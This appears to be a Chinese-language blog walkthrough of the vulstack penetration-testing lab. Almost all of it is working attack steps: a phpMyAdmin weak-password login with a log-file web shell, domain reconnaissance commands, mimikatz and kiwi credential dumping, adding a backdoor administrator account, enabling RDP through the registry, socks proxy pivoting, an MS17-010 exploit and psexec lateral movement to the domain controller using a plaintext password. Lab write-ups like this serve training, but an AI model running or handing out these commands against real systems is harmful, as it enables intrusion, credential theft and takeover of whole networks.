CHHHCHHOH 's BLOG

vulstack

外网

扫到如下端口


扫目录发现phpmyadmin

访问ChangeLog得到版本是3.5.8.2

直接弱密码登录

可以看到网站的根目录

通过更改数据库的日志文件为php后缀来getshell


内网

信息收集

systeminfo
echo %PROCESSOR_ARCHITECTURE% #要在cmd运行
net user                                #查看本地用户 /domain就是域用户
net localgroup administrators           #查看管理员组(通常包含域用户)
net config workstation     # 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等
net view /domain              # 查看域
net time /domain           # 主域服务器会同时作为时间服务器
net user /domain      # 查看域用户
net group /domain     # 查看域内用户组列表
net group "domain computers" /domain      #查看域内的机器
net group "domain controllers" /domain          #查看域控制器组
net group "Enterprise Admins" /domain    #查看域管理员组

获取系统权限

通过msf反弹shell


shell可能乱码,chcp 65001可以解决

获取账号密码

mimikatz.exe

log
privilege::debug
sekurlsa::logonpasswords

kiwi

load kiwi
help kiwi
creds_all

远程桌面连接

vnc

run vnc

rdp

run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=oldboy PASSWORD=123456 #添加用户,默认会添加到管理员组,但是太简单的密码可能因为安全问题无法设置,要尽量复杂
net user hacker Ch3Ch2oh /add
net localgroup administrators hacker /add #添加管理员权限
net user # 查询用户
rdesktop 192.168.1.107
xfreerdp /v:<server_address> /u:<username> /tls-seclevel:0 #/p:<password> 可选

搭建代理

ew

ew.exe -s ssocksd -l 8888
proxychains4 -f /etc/proxychains4.conf bash

成功通过内网的ip访问到web服务,socks代理是TCP/IP协议的,所以用icmp协议的ping是不通的。

msf

run autoroute -s 192.168.52.0/24
run autoroute -p
#退出反弹shell的session
background
use auxiliary/server/socks_proxy
run
sessions
sessions -i ID


这个是反向的socks连接,所以socks服务器是kali,socks5 127.0.0.1 1080

内网主机端口扫描

msf

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24


run post/windows/gather/enum_applications

cmd

查询域内所有客户端主机
net group "Domain Computers" /domain

fscan

./fscan -h 192.168.52.141 -socks5 127.0.0.1:1080
fscan本身提供了socks代理的功能

nmap

nmap -sT -Pn 192.168.52.141

第二台主机

因为fscan扫出了ms17-010,先用msf探测一下
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run


然后我们来远程连接这个主机

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run
set command net user hacker Ch3Ch2oh /add
run
set command net localgroup administrators hacker /add
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' #开启3389端口
run
rdesktop 192.168.52.141


本来想弄个正向shell的,但是防火墙关不掉(netsh advfirewall set allprofiles state off #用netsh关闭防火墙)
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set lport 5555
set rhosts 192.168.52.141

DC

根据之前获取到的用户和密码通过PsExec进行连接,注意这里要用正向shell

use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass Mac123456
set payload windows/meterpreter/bind_tcp
run

添加新评论